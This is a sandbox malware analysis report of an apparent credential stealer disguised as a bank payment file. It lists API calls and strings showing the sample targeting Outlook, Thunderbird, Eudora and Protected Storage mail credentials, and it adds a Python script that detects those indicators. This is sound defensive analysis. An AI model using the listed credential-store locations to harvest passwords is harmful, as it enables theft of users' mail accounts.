                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 726966127-0
                                                                                                                                                                                                                                          • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                                                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040B224
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
• Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
• Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
• Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
• Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
APIs
• memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
  • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
• memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
• memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
• memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID:
• API String ID: 231171946-0
• Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
• Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
• Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
• Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
APIs
• strlen.MSVCRT ref: 0040B0D8
• free.MSVCRT ref: 0040B0FB
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B12C
• memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
• API String ID: 3669619086-0
• Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
• Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
• Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
• Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
• malloc.MSVCRT ref: 00417407
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
• free.MSVCRT ref: 00417425
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
• Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
• Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
• Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
• Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
APIs
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: wcslen$wcscat$wcscpy
• String ID:
• API String ID: 1961120804-0
• Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
• Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
• Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
• Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 19.9%
Signature Coverage: 0.5%
Total number of Nodes: 870
Total number of Limit Nodes: 22
                                                                                                                                                                                                                                          execution_graph 34075 40fc40 70 API calls 34248 403640 21 API calls 34076 427fa4 42 API calls 34249 412e43 _endthreadex 34250 425115 76 API calls 34251 43fe40 133 API calls 34079 425115 83 API calls 34080 401445 memcpy memcpy DialogBoxParamA 34081 440c40 34 API calls 34083 411853 RtlInitializeCriticalSection memset 34084 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34257 40a256 13 API calls 34259 432e5b 17 API calls 34261 43fa5a 20 API calls 34086 401060 41 API calls 34264 427260 CloseHandle memset memset 33140 410c68 FindResourceA 33141 410c81 SizeofResource 33140->33141 33143 410cae 33140->33143 33142 410c92 LoadResource 33141->33142 33141->33143 33142->33143 33144 410ca0 LockResource 33142->33144 33144->33143 34266 405e69 14 API calls 34091 433068 15 API calls 34268 414a6d 18 API calls 34269 43fe6f 134 API calls 34093 424c6d 15 API calls 34270 426741 19 API calls 34095 440c70 17 API calls 34096 443c71 44 API calls 34099 427c79 24 API calls 34273 416e7e memset 34103 42800b 47 API calls 34104 425115 85 API calls 34276 41960c 61 API calls 34105 43f40c 122 API calls 34108 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34109 43f81a 20 API calls 34111 414c20 memset memset 34112 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34280 414625 18 API calls 34281 404225 modf 34282 403a26 strlen WriteFile 34284 40422a 12 API calls 34288 427632 memset memset memcpy 34289 40ca30 59 API calls 34290 404235 26 API calls 34113 42ec34 61 API calls 34114 425115 76 API calls 34291 425115 77 API calls 34293 44223a 38 API calls 34120 43183c 112 API calls 34294 44b2c5 _onexit __dllonexit 34299 42a6d2 memcpy 34122 405cda 65 API calls 34307 43fedc 138 API calls 34308 4116e1 16 API calls 
Call graph of the 0x400000 module. The report renders this as an interactive graph; its serialized node and edge data is not reproduced here, only the nodes it attributes API calls to (many further nodes appear only with an API-call count, e.g. 425115 "119 API calls", 43f5fc "149 API calls", 40bbf0 "138 API calls"):
• 44b3cf: GetModuleHandleA and GetProcAddress resolution (44b40e, 44b428, 44b45d, 44b487) followed by two VirtualProtect calls (44b435, 44b444), then 44b49f, which leads into the CRT start-up at 444c4a
• 444c4a: GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _controlfp, _initterm, __getmainargs, GetStartupInfoA, GetModuleHandleA, then the call into 40cf44; on return _cexit (444dcf) or exit (444dc8)
• 40cf44: LoadLibraryA/GetProcAddress/FreeLibrary (404a99, 410d0e), RegDeleteKeyA (40cff2), EnumResourceTypesA (40d007), MessageBoxA (40d02f), CoInitialize (40d0a0), strncat/memset/RegisterClassA/CreateWindowExA (40cc26), ShowWindow/UpdateWindow/LoadAcceleratorsA (40d0b1), PostMessageA (40c256), a GetMessageA/TranslateAccelerator/IsDialogMessage/TranslateMessage/DispatchMessageA loop (40d0f9-40d16d), CoUninitialize (40d17b)
• 40ce70 -> 4023b2 -> 401e69: memset, GetFileAttributesA (406f81), RegOpenKeyExA/RegQueryValueExA/RegEnumKeyExA/RegCloseKey walks (410a9c, 410add, 410b62, 401c31, 410dbb), ExpandEnvironmentStringsA (402195), _strcmpi, atoi, sprintf; 40c3d0: memset/GetModuleFileNameA/strrchr, GetWindowPlacement (40c502); 40affa: GetStdHandle (40b01f) or CreateFileA (406d1a), strlen/WriteFile (40a57c), CloseHandle (40b116)
• 403c16 and the functions it calls (4036e5, 4085d2, 40821d, 4086e0, 402c5d, 402fdb, 4032b7, 4037ca, 40fb00, 40f96c, 4442ea): UuidFromStringA/memcpy/CoTaskMemFree (410863); memset x4, GetComputerNameA, GetUserNameA, MultiByteToWideChar x2, strlen x2, memcpy (4082cd, continuing at 40841c into the RegOpenKeyExA wrapper 410a9c); RegOpenKeyExA/RegEnumKeyExA/RegQueryValueExA/RegCloseKey loops with memset and sprintf; LoadLibraryA plus five GetProcAddress (4045db) then CredEnumerateW (40872b), wcslen, wcsncmp, memcpy/wcschr, LocalFree (4088c3); GetPrivateProfileStringA (403166) and GetPrivateProfileSectionA (4032f8); WideCharToMultiByte and _strnicmp (40fa13-40fa88, 40f797); RegQueryValueExA followed by memcpy and LocalFree (40fb55-40fc19, 40f5c3-40f661); FindFirstFileA/FindNextFileA/FindClose (407ef8, 407f90); ExpandEnvironmentStringsA/_strcmpi (4443b9, 4443f4)
• 410b92 and 410bbc: GetPrivateProfileIntA (410a89), memset/_itoa/WritePrivateProfileStringA (410983), memset/GetPrivateProfileStringA (410a23), WritePrivateProfileStringA (410a0c), strtoul (40737c)
• 40b5bf: memset, memset, _mbsicmp
Control-flow Graph

Basic blocks of the function at 0x4082cd (block id, address range, API calls) and the edges between them; the report draws this as a graph with executed and not-executed blocks marked:
129 4082cd-40841a: memset x4, GetComputerNameA, GetUserNameA, MultiByteToWideChar x2, strlen x2, memcpy
130 408450-408453
131 40841c
132 408422-40842b
133 408484-408488
134 408455-40845e
135 408432-40844e
136 40842d-408431
137 408460-408464
138 408465-408482
Edges: 129->130, 129->131, 130->133, 130->134, 131->132, 132->135, 132->136, 134->137, 134->138, 135->130, 135->132, 136->135, 137->138, 138->133, 138->134

APIs
• memset.MSVCRT ref: 0040832F
• memset.MSVCRT ref: 00408343
• memset.MSVCRT ref: 0040835F
• memset.MSVCRT ref: 00408376
• GetComputerNameA.KERNEL32(?,?), ref: 00408398
• GetUserNameA.ADVAPI32(?,?), ref: 004083AC
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
• strlen.MSVCRT ref: 004083E9
• strlen.MSVCRT ref: 004083F8
• memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
All eleven call sites fall in block 129: the computer name and user name are read into zeroed buffers, both converted to wide strings (0xFF-character limit), measured, and a fixed 16-byte memcpy follows. The function is reached from 4085d2 and continues at 40841c into the RegOpenKeyExA wrapper at 410a9c, i.e. it sits on the registry/credential collection path.
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150
                                                                                                                                                                                                                                          • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                                                                                          • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

Control-flow Graph (graph rendering omitted; basic blocks and edges as extracted): entry 407ef8-407f01; 407f03-407f22 FindFirstFileA; 407f24-407f38 FindNextFileA; 407f3a call 407f90; 407f3f-407f44; 407f46-407f74 strlen * 2; 407f76-407f81 call 4070e3; 407f83; 407f86-407f88; 407f89-407f8f (exit)
APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
• FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
• strlen.MSVCRT ref: 00407F5C
• strlen.MSVCRT ref: 00407F64
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID: ACD
• API String ID: 379999529-620537770
• Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
• Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
• Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
• Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

Control-flow Graph (graph rendering omitted)
APIs
• memset.MSVCRT ref: 00401E8B
• strlen.MSVCRT ref: 00401EA4
• strlen.MSVCRT ref: 00401EB2
• strlen.MSVCRT ref: 00401EF8
• strlen.MSVCRT ref: 00401F06
• memset.MSVCRT ref: 00401FB1
• atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
• memset.MSVCRT ref: 00402003
• sprintf.MSVCRT ref: 00402030
  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
• memset.MSVCRT ref: 00402086
• memset.MSVCRT ref: 0040209B
• strlen.MSVCRT ref: 004020A1
• strlen.MSVCRT ref: 004020AF
• strlen.MSVCRT ref: 004020E2
• strlen.MSVCRT ref: 004020F0
• memset.MSVCRT ref: 00402018
  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
• _mbscpy.MSVCRT(?,00000000), ref: 00402177
• RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
• ExpandEnvironmentStringsA.KERNELBASE(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
• String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
• API String ID: 1846531875-4223776976
• Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
• Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
• Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
• Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
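The two function listings above are what backs the report's "Tries to steal Mail credentials (via file / registry access)" verdict: one enumerates `*.oeaccount` files with FindFirstFileA/FindNextFileA, the other resolves the Thunderbird and Eudora install and profile locations through the registry and `%programfiles%`, then loads `nss3.dll`/`sqlite3.dll` (the report's Protected Storage function further down adds the Outlook and `pstorec.dll` indicators). The script below is an added example, not code from Joe Sandbox, the report or the sample: it parses the report's own "APIs", "Strings" and "String ID" bullets, pulls out the literal strings, and maps them onto the credential stores they reach so an analyst can confirm the verdict from the listing alone. The indicator table, the two-store threshold and the embedded sample lines (copied from the listings on this page) are this example's assumptions.

```python
"""Triage helper for a Joe Sandbox function listing: map the registry keys,
file masks and libraries a function touches back to the mail credential
stores they reach, so the 'steals mail credentials' verdict can be confirmed
from the listing alone.

Added example, not part of the Joe Sandbox report, the analysed sample or
any Joe Security tooling. The parsed line formats are the report's own
"APIs", "Strings" and "String ID" bullets; the indicator table and the
two-store threshold are this example's assumptions.
"""
import re
from collections import defaultdict

# "APIs" bullet: optional "Part of subcall function X:" prefix, then
# Name.MODULE(args), ref: ADDRESS; the report omits args/ref on some lines.
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w@?$]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)
# "Strings" bullet: <string>, xrefs: ADDRESS
XREF_LINE = re.compile(r"^\s*•?\s*(?P<s>.+?),\s*xrefs:\s*[0-9A-Fa-f]{8}\s*$")
# "String ID" bullet: every referenced string joined with '$'
STRING_ID_LINE = re.compile(r"^\s*•?\s*String ID:\s*(?P<ids>.*?)\s*$")
HEX32 = re.compile(r"[0-9A-Fa-f]{8}")

# Indicator regex (case-insensitive, searched in each string) -> (store, how).
# Assumed mapping, based on where each product keeps its account data.
CREDENTIAL_STORE_INDICATORS = [
    (r"\*\.oeaccount$", "Windows Mail / Outlook Express", "*.oeaccount account files"),
    (r"software\\mozilla\\mozilla thunderbird", "Mozilla Thunderbird", "install path via registry"),
    (r"%programfiles%\\mozilla thunderbird", "Mozilla Thunderbird", "default install path"),
    (r"thunderbird\\profiles", "Mozilla Thunderbird", "profile directory"),
    (r"^(nss3|sqlite3)\.dll$", "Mozilla Thunderbird", "loads NSS/SQLite to read logins"),
    (r"software\\qualcomm\\eudora\\commandline", "Qualcomm Eudora", "registry"),
    (r"software\\microsoft\\internet account manager\\accounts", "Outlook Express / Internet Mail", "registry"),
    (r"software\\microsoft\\office\\outlook\\omi account manager\\accounts", "Microsoft Outlook", "OMI account registry"),
    (r"software\\microsoft\\office\\\d+\.\d+\\outlook\\profiles", "Microsoft Outlook", "versioned profile registry"),
    (r"software\\microsoft\\windows messaging subsystem\\profiles", "Microsoft Outlook", "MAPI profile registry"),
    (r"^(pstorec\.dll|pstorecreateinstance)$", "Protected Storage (legacy IE/Outlook)", "pstorec.dll"),
]
INDICATORS = [(re.compile(p, re.IGNORECASE), store, how) for p, store, how in CREDENTIAL_STORE_INDICATORS]


def parse_api_line(line):
    """Return (api, module, [literal string args], ref) or None if not an API bullet."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
    # Keep only literal strings: drop '?' placeholders and 32-bit hex values.
    strings = [a for a in args if a != "?" and not HEX32.fullmatch(a)]
    return m.group("api"), m.group("module"), strings, m.group("ref")


def extract_strings(report_lines):
    """Collect every literal string the listing exposes (API args, xrefs, String ID)."""
    found = []
    for line in report_lines:
        parsed = parse_api_line(line)
        if parsed:
            found.extend(parsed[2])
            continue
        m = XREF_LINE.match(line)
        if m:
            found.append(m.group("s"))
            continue
        m = STRING_ID_LINE.match(line)
        if m:
            found.extend(s for s in m.group("ids").split("$") if s)
    return found


def classify(strings):
    """Group matched indicators by the credential store they reach."""
    hits = defaultdict(set)
    for s in strings:
        for rx, store, how in INDICATORS:
            if rx.search(s):
                hits[store].add(how)
    return {store: sorted(hows) for store, hows in sorted(hits.items())}


def mail_credential_theft_verdict(report_lines, min_stores=2):
    """(verdict, hits): True once the listing reaches `min_stores` distinct stores.
    The threshold is an assumption: a single Thunderbird path lookup is something
    legitimate software does, touching several unrelated mail stores is not."""
    hits = classify(extract_strings(report_lines))
    return len(hits) >= min_stores, hits


# Constructed sample input: lines copied from the function listings on this page.
SAMPLE_REPORT_LINES = [
    "• FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E",
    "• strlen.MSVCRT ref: 00407F5C",
    "  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB",
    "• ExpandEnvironmentStringsA.KERNELBASE(%programfiles%\\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C",
    "• String ID: %programfiles%\\Mozilla Thunderbird$%s\\Main$Install Directory$Mozilla\\Profiles$Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current$Software\\Mozilla\\Mozilla Thunderbird$Software\\Qualcomm\\Eudora\\CommandLine$Thunderbird\\Profiles$current$nss3.dll$sqlite3.dll",
    "• LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35",
    "• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A",
    "• Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles, xrefs: 00403DA4",
    "• Software\\Microsoft\\Internet Account Manager\\Accounts, xrefs: 00403CD6",
]

if __name__ == "__main__":
    verdict, hits = mail_credential_theft_verdict(SAMPLE_REPORT_LINES)
    print("mail credential theft:", verdict)
    for store, hows in hits.items():
        print(f"  {store}: {', '.join(hows)}")
```

The parser deliberately discards `?` placeholders and 8-digit hex arguments, which in this listing are stack contents rather than strings, so only the literals Joe Sandbox recovered from the dump feed the classifier; the same three regexes work on any function block of this report, so the helper can be run over the whole export rather than the handful of lines embedded here.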

Control-flow Graph (graph rendering omitted)
APIs
  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,76940A60,?,00000000,?,?,?,0040CF60,76940A60), ref: 00404AB8
  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76940A60), ref: 00404ADE
  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
• DeleteObject.GDI32(?), ref: 0040D1A6
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
• String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
• API String ID: 745651260-375988210
• Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
• Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
• Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
• Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

Control-flow Graph (graph rendering omitted)
APIs
  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
• LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
• _mbscpy.MSVCRT(?,?), ref: 00403E54
Strings
• Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
• www.google.com/Please log in to your Google Account, xrefs: 00403C9A
• Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
• Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
• pstorec.dll, xrefs: 00403C30
• www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
• www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
• Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
• Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
• www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                                                                          • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                                                                          Memory Dump Source
